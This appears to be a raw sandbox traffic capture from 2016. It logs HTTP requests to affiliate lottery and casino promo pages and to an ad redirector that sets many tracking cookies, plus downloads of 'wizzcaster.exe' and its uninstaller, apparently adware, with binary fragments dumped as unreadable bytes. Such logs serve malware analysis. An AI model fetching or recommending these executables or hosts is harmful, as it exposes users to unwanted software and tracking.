6b4.............X{o....*.....H~4n2U)Z...[..M...1.Z.l....Tc..w.!......O
L....#2f...dIl..W.[bN.@DD...*..k........,..a.......'lN....t...........
..aw.......=F;.{[email protected][y.......f.{..N...lo8...[bc.>e.....q.....g.
.x-......W...w....M.)....{&...GL.6(...FsP'....61r..(.o./.~.K.~......,.
..@ ..4..H.....*..~G.....B.I...=.h-s....z1}i...2.=b7g.,...6]R_[...3...
4.m.MN.#.....A......4......I....y...._&..wJ..O.0...1.kE..VD..7..:..>
;........(=.i&..V...,T.\..[..d.'.jFeU...c]#_....E..l.I...Y......gF...F
....M..X..yH.|.....a.UJ..U..&.j.%3..jp!\.B,.)....{..`.Q.>...17M.&.u
r.!.....j......x.0..W.X....a..bb.........h*........'...... .n.mX,p..6F
..M........V\[...0.#....X~...d.Q...o..M....1m..g;W,[email protected]
!.............$...?..d....A...^.w..@>W?',6....4......HL...kZ.L.Sp}.
......Y*..|...jI(G!&......,hC.z..bJ......g......../...J.'.q....F....d.
 .4.U....#...O!g1O..?....z.....4W.^.i..wD..D"4.........z;...,z.I.$...z
.........f...ti.Ii...H=`....#..0Xz=.5......rB).:..I.... (J..!....$....
.O.Z...5....4E9F.....T5v.^.........1.@...=... [email protected]..$JV..A......(;.
.}..l}..%.....n.B}....,{.....w......F)...JA.'...8t. .(.......s......l.
..\...U0m<......]B..h.V....BW......9.c.._...]..".}.....<.i..sx.g
.;.(.OJ..>.R~.._.?Mb5&A.k..x;f...c.7&.3.J.....}.Ds)S.=..T.2J.R.h.S.
..O........R.p..E.......nhC.@..".....{.......f......M2.|....9....W..V.
..........<,P.^.r8..4. ....yv^^^....K.L.p{v.A....&"} ....A(,d4.M.??
>[email protected].._,...WW..........?%..5.\......Iwp....\u..
.kjdr..H2.S..O............[i....F....._b....d..6..[(....l..I....J\
<<< skipped >>>

GET /SiteSeal/siteSeal/siteSeal/siteSeal.do?p1=VVV.freelotto.com&p2=SZ125-50&p3=image&p4=en&p5=V0022&p6=S001&p7=http HTTP/1.1

Accept: */*

Referer: hXXp://VVV.freelotto.com/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: ssif1.globalsign.com

Connection: Keep-Alive

Cookie: __cfduid=d9dd80a85cc8186fa0709703ac21924ae1476511695

HTTP/1.1 200 OK

Date: Sat, 15 Oct 2016 06:08:16 GMT

Content-Type: text/javascript;charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Age: 0

Via: AX-CACHE-2.7:45

Server: cloudflare-nginx

CF-RAY: 2f21187367f62902-OTP

Content-Encoding: gzip
f...................1d3...R.j.0../....BL....{hMYv),....C/A.?..Y.VR..O.
X.....[..43..F..vw.{..V.\....v.D.. .A..5..%...|...O.a.?X=JP..7L...v..Z
3.V.Y/..|N.6&`"..?..ku.O.c..U.....=.fp...zCn:.~0.i..8.k..kI.;....(*.)J
......I.y.p..;...o.n.Fn.*.....|..........L|.<..........L1iHJ.Y.]|.5
ebx..xZ.".J...5 E.a.Yq./..Zq.4A..8...R...(w..z..FN`..T.jZ.c9.......(2.
.F.z...:..F.Q.;R*4.!.  c.#...j....XY. D...>.W({....a(....Y...%...3.
..C...w....$..3...$.\.{..m......6...j.m..EZ$9.t.Y..G....../.s}... 8...
..?.......246...VMo. .. ..8j....f..V.KU..EU.fHQ.c...n.....'Ns.a/......
c.......].....^..Qrg.[@.....w.....)m`..N.Y....m.....E<..........n.4
.7.w..%.h&JJV..D%........hI..3.."S...HX.K..`YMR.i.e....2.`R..3&dQ..S..
Ld....YP...A....sL..$.N....Q!8.2)TM.....P..".........6#.B[..#...w..A..
../.s..P...Sa.r.._.&v.K.....c.F..e.........,l.....s......../<uU9...
.*F..9r.....p.4..<..}........;..!.......Iz.>....[.{.=....>...
..n\.N4...~.5N......;t9S'.,.*...0J..........P...<...z...Z.... ^G.m.
......}../o.....z.....w....7.Ac..c.d.W.{C%.q[.....C.t..H.F..k..5..#...
G..P..j..i...ai.... ....!......... ..>.-..q..'.!s........20f...V[o.
0.. V...,.l...........I_*M....0..4....`..PUyp,.w....0#.......f...e....
]X.[.6Ro.)5..........z.I..i... .^.FQt.C.../d..U..'.r..d...T!..xo.Y`/.n
O.V...Y..q..CX..kKB.... .I.`.......r.$...W.....k0.Fr..`'..1F)..z..i.u.
y...q......RX..c.....V.... ^..!N.%...!..JN..(.P`..`H.&]>H.%.....6Z.
...j.u/...I....]i_...".SY...|...~....b.X..... .p.&..P........5u.%..rg.
rb.`.C.............8m>....A.'.jI.,..f..C.v...h).'`...tc....j...
<<< skipped >>>

GET /SiteSeal/siteSeal/siteSeal/siteSealImage.do?p1=VVV.freelotto.com&p2=SZ125-50&p3=image&p4=en&p5=V0022&p6=S001&p7=http&deterDn= HTTP/1.1

Accept: */*

Referer: hXXp://VVV.freelotto.com/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: ssif1.globalsign.com

Connection: Keep-Alive

Cookie: __cfduid=d9dd80a85cc8186fa0709703ac21924ae1476511695

HTTP/1.1 200 OK

Date: Sat, 15 Oct 2016 06:08:17 GMT

Content-Type: image/png

Content-Length: 4532

Connection: keep-alive

Age: 2937

Via: AX-CACHE-2.7:45

Server: cloudflare-nginx

CF-RAY: 2f21187992272902-OTP
.PNG........IHDR...}...2.....q.......tEXtSoftware.Adobe ImageReadyq.e&
lt;...$iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CS5.1 Macintosh" xmpMM:InstanceID="xmp.iid:19E7779E5F6C11E38282E8
46FC2E56B0" xmpMM:DocumentID="xmp.did:19E7779F5F6C11E38282E846FC2E56B0
"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:19E7779C5F6C11E3
8282E846FC2E56B0" stRef:documentID="xmp.did:19E7779D5F6C11E38282E846FC
2E56B0"/> </rdf:Description> </rdf:RDF> </x:xmpmeta&
gt; <?xpacket end="r"?>.......&IDATx..\ol.W...\.&..E....5M....,.
*...E..)> . 9........T..R.W>PU..APJ.|F.D[G>...V.CjSU..S....uK
!m..n...M............-....n......................J...j.6ah........jYh.
.{..T....w.@[email protected]..$..Q.414..(&.4.!...`jl"...e.y...}>.Q..5.....
.C.o.h.....N..I.Z8..A..`....N...D.....m....~...3....7......o...6..]4.a
{~..{....t}u).t....'..*.....:.|&.S.....3.}.g"...#[.o.z.e=....V.x9.....
...&`w_..2@'..!`.r..6..W\...:..3{..4{..g.8...o..'..IP..FV............!
.c..w'._.y..j....)T........ ..1.|....r....Dw~n...w.x^.Y..w..I.._..#...
.Ww.N..)J..$.WZ.o....|Z<vp....9-.....w.Y.o.....O?k.....'.n...E.
<<< skipped >>>

GET /pp/promo/9302/css/main.css HTTP/1.1

Accept: */*

Referer: hXXp://cosmicwin.com/vulkanchampion/p9302/?atp=MH RON&plid=1706&bnid=7462&goto=sitereg&face=casino

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn1.cosmicwin.com

Connection: Keep-Alive

Cookie: promouuid=PP5801c7cba9aa3; 3eca792413c698ac9e2064835341acba=1; _MHRON_p9302=1

HTTP/1.1 200 OK

Server: ucdn

Date: Sat, 15 Oct 2016 06:08:12 GMT

Content-Type: text/css

Transfer-Encoding: chunked

Connection: keep-alive

Keep-Alive: timeout=20

Last-Modified: Thu, 06 Oct 2016 15:28:22 GMT

Vary: Accept-Encoding

X-Ureq-ID: PYMqMNZBGwvbYkCmvc4f2OevbRq3YdLtBPh8IlceiB MxrFmIynxf0DAPAVfTm PXQ nxwdjwcYKVvDR4SoZ8mDi285TNPd90tyGQZ14jwnvMh7qmg==

Expires: Sun, 16 Oct 2016 11:17:07 GMT

Cache-Control: max-age=104935

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: HEAD, GET, OPTIONS

Content-Encoding: gzip
358.............V.n.0.....J.TS ...K....x.6...4..wl..)I.[U.K.x<...s.
...|.4...Z... ...1.9F...!....u..[.....u.3....}....Z..(....%d..UM..qx.I
..H..%...&...{Vo...*..i.....m. .|c$iC..\.'..j.b....vPP............YK..
,...q*....[.>fM;........K.>4m.Vb#.ts.SI ...]m).l5NRp...K....p^.b
....\.j...x.4.*...AK..Z...'.Lo.X...[..E}.....?.........lsHR....".VS.7.
.K.r.MZ?6...TV.h..j..`e.. V..k.......6.}br...5m.5P..h..E..B.\..~...Yh.
K....t..D....Q..Y\....lSb.....Q.K........\.X.!.Ge.c.5<.\...@.=...Ej
KJ.....i.E.?.....%.H....... GN}C....I......h._b.l'...dr.}.............
..R.....MS..u..>][email protected].~..Z...V[..
.(.V..{..(b....r)..i.Bd.g..}F.MR..9.S.N. ......z.vT....e.....;3h..A...
xqK..Z8..XO...........k.-..x.....w...y.......-.T:.R<L)...nAsK.P.4..
2[.86K...8.g...:=...G..&6.......[mV!...xw..xs..:...t...mT......k77.B2.
F.=..yV.i..u...u..-.L.t...|Z....Ta.......0......


GET /pp/promo/9302/img/bg-desktop.jpg HTTP/1.1

Accept: */*

Referer: hXXp://cosmicwin.com/vulkanchampion/p9302/?atp=MH RON&plid=1706&bnid=7462&goto=sitereg&face=casino

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn1.cosmicwin.com

Connection: Keep-Alive

Cookie: promouuid=PP5801c7cba9aa3; 3eca792413c698ac9e2064835341acba=1; _MHRON_p9302=1

HTTP/1.1 200 OK

Server: ucdn

Date: Sat, 15 Oct 2016 06:08:12 GMT

Content-Type: image/jpeg

Content-Length: 526951

Connection: keep-alive

Keep-Alive: timeout=20

Last-Modified: Thu, 06 Oct 2016 15:28:22 GMT

ETag: "57f66d96-80a67"

X-Ureq-ID: PYMqMNZBGwvbYkCmvc4f2OevbRq3YdLtBPh8IlceiB MxrFmIynxf0DAPAVfTm PXQ nxwdjwcYKVvDR4SoZ8mDi285TNPd90tyGQZ14jwnvMh7qmg==

Expires: Sun, 16 Oct 2016 11:17:07 GMT

Cache-Control: max-age=104935

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: HEAD, GET, OPTIONS

Accept-Ranges: bytes
......JFIF.............C..............................................
......................C...............................................
........................8.............................................
............................................................L...,W.IC&
lt;..@.&.._.O...........l,Ulr.%..[..;;.v]......C%N. H.[..:.5.kR.NC.<
;%$X...AP...H..P...B.P..PTk...6 (*J..I.X1...T..s~zv.A.h.... ........1.
....%L..Bj....,.` B..P..@.>,k..fl.i...X..4.. .h..1.A#[email protected].;
...J..*h..$..X....c%.:(......DQ.ew(..<.k.u....x.....h....Z..$'R.`..
.............................j7)...........'....d..Q..U ......^c......
. \e..$..S.k.....V..n&...E.aJ.........>. .....>-. .J5H..' .....b
.P...T(...oO...T(...b....Q.9..l}[email protected].....\.gc...h.0.*
..T.D.....W9.:[email protected](.6p......1...b...#..ST4g.:
..8...Q.eRF{.6{[email protected].............................
.....5.j4.....(G*.....j....r/.n.]x.q.:..lUj..6.c..~s..i.cS.J..[Zj..m..
.T...u.0.....T...T.......!.ZT*j.%B.5....!S........`[email protected]*.cX[i...@....
....0@ [email protected] .....4.A5..Z
F5.i.>3..}.a`..e..X.k..oN,......")..j.Y[.........U>SuQ.el.....*.
.$nq[[email protected]...@......*`.>3.......F .H......,l.U.'f...g..GG\.IU.
......~...v:...MGr.wh.....j.}#!.q.6..XKc..B.....(De.:.pMV....4...,.V..
[email protected]..%. .@.!AAP....<.je..tX%........4Yz..}[email protected]......
..b.......*..[\.$.....#B...T..f... `...m.X....... #`4..!.. ....|^.MJ0m
b..F 1.j9.....nP%N)...$f.(,.{...5.6J9[9........&..,._...ZcU...E.0[
<<< skipped >>>

GET /link.engine?guid=acdcc8ca-2da5-40a4-be1c-c1355bb0eac0&Hardlink=true&time=0&SubID=14335&tid=as3a69f752f41747b8e938f36478162c9e&dp=3270664418.501309.78515570f2.14335.3a69f752f41747b8e938f36478162c9e HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Connection: Keep-Alive

Host: engine.phn.doublepimp.com

HTTP/1.1 302 Found

Cache-Control: private

Content-Type: text/html; charset=utf-8

Location: /Redirect.eng?MediaSegmentId=17334&dcid=3_ctx_67bc49d4-8baf-474c-be66-7a5257825257&vmId=f7c3cd08-7204-4692-bd82-bc4f9e177b64&abr=false&timeZoneOffset=

Server: Microsoft-IIS/8.5

Set-Cookie: IKSR={}; path=/

Set-Cookie: IUID=eaaa069b-50ba-43c2-9264-3cdebc697249; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/

Set-Cookie: ISSH=36782C; path=/

Set-Cookie: VMI=; path=/

Set-Cookie: IPLH=#{}; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: IPLH_Q=#[]; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: IPLSH=#{}; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: IPLSH_Q=#[]; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: IZH=#{}; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: IZH_Q=#[]; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: IMCH=#{}; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: IMCH_Q=#[]; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: IMH=#{}; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: IMH_Q=#[]; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: ISH=#{"176":[{"SId":"36782C","D":"2016-10-14T23:08:12"}]}; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: ISH_Q=#[176]; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: ISPH=#{}; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/

Set-Cookie: ISPH_Q=#[]; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: CH=#[]; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: MSSH=#{}; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: MSRH=#{}; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: ILP=null; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/

Set-Cookie: ILPLU=#1/1/0001 12:00:00 AM; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: ILEALC=#1/1/0001 12:00:00 AM; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: ILMPF=#False; expires=Sat, 15-Oct-2016 10:08:12 GMT; path=/; HttpOnly

Set-Cookie: IPMPLU=#; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: IPMUID=#; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: BSWUID=#; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: IKSR={}; path=/

Set-Cookie: ICH=#{}; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: ICH_Q=#[]; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

X-Powered-By: ASP.NET

P3P: CP="CAO PSA OUR IND"

Date: Sat, 15 Oct 2016 06:08:12 GMT

Content-Length: 283
<html><head><title>Object moved</title></he
ad><body>..<h2>Object moved to <a href="/Redirect.en
g?MediaSegmentId=17334&dcid=3_ctx_67bc49d4-8baf-474c-be66-7a525782
5257&vmId=f7c3cd08-7204-4692-bd82-bc4f9e177b64&abr=false&t
imeZoneOffset=">here</a>.</h2>..</body></html&
gt;......
<<< skipped >>>

GET /Redirect.eng?MediaSegmentId=17334&dcid=3_ctx_67bc49d4-8baf-474c-be66-7a5257825257&vmId=f7c3cd08-7204-4692-bd82-bc4f9e177b64&abr=false&timeZoneOffset= HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Cookie: IKSR={}; IUID=eaaa069b-50ba-43c2-9264-3cdebc697249; ISSH=36782C; VMI=; IPLH=#{}; IPLH_Q=#[]; IPLSH=#{}; IPLSH_Q=#[]; IZH=#{}; IZH_Q=#[]; IMCH=#{}; IMCH_Q=#[]; IMH=#{}; IMH_Q=#[]; ISH=#{"176":[{"SId":"36782C","D":"2016-10-14T23:08:12"}]}; ISH_Q=#[176]; ISPH=#{}; ISPH_Q=#[]; CH=#[]; MSSH=#{}; MSRH=#{}; ILP=null; ILPLU=#1/1/0001 12:00:00 AM; ILEALC=#1/1/0001 12:00:00 AM; ILMPF=#False; IPMPLU=#; IPMUID=#; BSWUID=#; ICH=#{}; ICH_Q=#[]

Connection: Keep-Alive

Host: engine.phn.doublepimp.com

HTTP/1.1 200 OK

Cache-Control: private

Content-Type: text/html; charset=utf-8

Content-Encoding: gzip

Vary: Accept-Encoding

Server: Microsoft-IIS/8.5

Access-Control-Allow-Origin: *

Set-Cookie: IKSR={}; path=/

Set-Cookie: IUID=eaaa069b-50ba-43c2-9264-3cdebc697249; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/

Set-Cookie: ISSH=36782C; path=/

Set-Cookie: VMI=f7c3cd08-7204-4692-bd82-bc4f9e177b64; path=/

Set-Cookie: IPLH=#{"19965":[{"SId":"36782C","D":"2016-10-14T23:08:12"}]}; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: IPLH_Q=#[19965]; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: IPLSH=#{}; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: IPLSH_Q=#[]; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: IZH=#{"854":[{"SId":"36782C","D":"2016-10-14T23:08:12"}]}; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: IZH_Q=#[854]; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: IMCH=#{}; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: IMCH_Q=#[]; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: IMH=#{"28674":[{"SId":"36782C","D":"2016-10-14T23:08:12"}]}; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: IMH_Q=#[28674]; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: ISH=#{"176":[{"SId":"36782C","D":"2016-10-14T23:08:12"}]}; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: ISH_Q=#[176]; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: ISPH=#{"176":[{"SId":"36782C","D":"2016-10-14T23:08:12"}]}; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/

Set-Cookie: ISPH_Q=#[176]; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: CH=#[]; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: MSSH=#{}; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: MSRH=#{}; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: ILP=null; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/

Set-Cookie: ILPLU=#1/1/0001 12:00:00 AM; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: ILEALC=#1/1/0001 12:00:00 AM; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: ILMPF=#False; expires=Sat, 15-Oct-2016 10:08:12 GMT; path=/; HttpOnly

Set-Cookie: IPMPLU=#; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: IPMUID=#; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: BSWUID=#; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: IKSR={}; path=/

Set-Cookie: ICH=#{"11342":[{"SId":"36782C","D":"2016-10-14T23:08:12"}]}; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

Set-Cookie: ICH_Q=#[11342]; expires=Thu, 15-Oct-2026 06:08:12 GMT; path=/; HttpOnly

X-Powered-By: ASP.NET

P3P: CP="CAO PSA OUR IND"

Date: Sat, 15 Oct 2016 06:08:12 GMT

Content-Length: 494
.............`.I.%&/m.{.J.J..t...`[email protected]#).*..eVe]f.@......{
....{....;.N'...?\fd.l..J...!....?~|.?"...Ey..'i.x.g......Vm.^...>j
.w.....3.....b9.../^.~............;....X.W.g./.h.g.j....>.}..uU?1.L
..xYo..6./.../.i.l.. .....l.......gO.....M6.G/.EN...........z...O=..._
=..._>}..,O_....=n_..O........w.;?....}..o_.../.........g.....u....
..W.lw..m?_.3.........N.N.>}x...^...eK_}.K.....D<...}....N..5.F.
K.!..(Mu..J0...........]=.{...n.......ZO.|U,VwW.u6m........}...../>
.s(0;.)J......-...(.....
<<< skipped >>>

GET /download/3/wizzcaster.exe HTTP/1.1

Host: dl.wizzuniquify.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Sat, 15 Oct 2016 06:07:56 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="wizzcaster.exe"

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
3ac00..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
......W................................. ........@.. .................
[email protected]............
....................... ..............................................
.. ............... ..H............text........ ...................... 
..`.rsrc...............................@[email protected].....................
[email protected].......,|...8..........|5...F...
........................................(i...*...(....*.r...p(....r...
p(....&s....o....*....(....~....%-.&~..........s....%.....o....*..s...
......*..(....*.0...........o......o....r#..po....,........%..,.o.....
...s....(....r'..p(.....(......o........... ...........o....,.......X.
......i2..-..*..o........o....................io....&..(..........,...
o.......*........)........0..x......... .....%.1...(....}............%
.2...(....}.....(....s........{.....{....o....}.......{.....{....o....
}.....s....}....*Fs....%o....o....*..Fs....%o....o....*..:...(....(...
.*..0.._........{.....o.....s....%.{.....s..........io ....o!...%.jo".
..%o...........%....io....&.o#...o#....*.:...(....(....*..0..U.......s
....%.{.....s....%....io ...o!...%.jo"...%o...........%....io....&o#..
..{.....o$...*....0..J........o%...-.r1..ps&...z.o%....[.............o
'...((......%.X.....X...o%...2..*...0..`.......r...p... J......./..r..
.p..()...(*.... (..d/..r...p..()...(*.... ....()...(.......X....o 
<<< skipped >>>

GET /download/3/wizzcasterUninstaller.exe HTTP/1.1

Host: dl.wizzuniquify.com

HTTP/1.1 200 OK

Date: Sat, 15 Oct 2016 06:07:56 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="wizzcasterUninstaller.exe"

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
33c00..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
......W.........."[email protected]^... ...`....@.. .................
...................@.................................(^..O....`.......
................`.......\.............................................
.. ............... ..H............text....>... ...@................
.. ..`.rsrc........`.......B..............@[email protected].......`.......:..
[email protected]................\^......H.......@"...9..........8\....
...........................................0..6.......~..........%..|.
o.................(....(.......&...*.*..........//.......0...........(
......(.....o....s..... o.....s....%.o....%.o.....(.....o....o......s.
.......s......i.).....%......io.......o ...o ...(!........o"...r...p(#
...o$...*..-.r...ps%...z.(&...o'...%-.r3..ps%...z.......%...o(...&*.rQ
..p.....*....0.. ..........X..X...()...&(..........~....(......&..*...
......''........(*...*.~....-.r. .p.....( ...o,...s-........~....*.~..
..*.......*.~....*..(....*Vs....(/...t.........*BSJB............v2.0.5
0727......l.......#~..H...$...#Strings....l.... ..#US.<7......#GUID
...L7......#Blob...........W..........3........0.................../..
......................................."...........................(..
.........o.....P...................................~.....3...........)
.............#...P.......c.........c.....S.....>.....;.s.....s.....
....J....._...........9.....W.....^.....T.........................
<<< skipped >>>

GET /offer.asp?offer=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.freelotto.com

Connection: Keep-Alive

HTTP/1.1 302 Found

Server: Apache/2.2.31

X-Frame-Options: SAMEORIGIN

Location: hXXp://VVV.freelotto.com/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV

Cache-Control: private

Content-Type: text/html; charset=UTF-8

Set-Cookie: affiliateid=5388363; path=/

Set-Cookie: tid=668d6cba-f9e3-4038-9a03-fcf3a800299e; path=/

Content-Length: 0

Accept-Ranges: bytes

Date: Sat, 15 Oct 2016 06:08:13 GMT

Via: 1.1 varnish

Age: 0

Connection: keep-alive

X-Served-By: cache-lcy1128-LCY

X-Cache: MISS

X-Cache-Hits: 0

X-Timer: S1476511693.356559,VS0,VE80

Vary: Accept-Encoding
....


GET /register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.freelotto.com

Connection: Keep-Alive

Cookie: affiliateid=5388363; tid=668d6cba-f9e3-4038-9a03-fcf3a800299e

HTTP/1.1 200 OK

Server: Apache/2.2.31

X-Frame-Options: SAMEORIGIN

Cache-Control: private

